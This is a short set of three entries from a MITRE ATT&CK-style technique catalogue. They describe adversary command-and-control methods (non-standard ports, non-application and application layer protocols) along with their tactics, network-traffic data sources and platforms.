Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre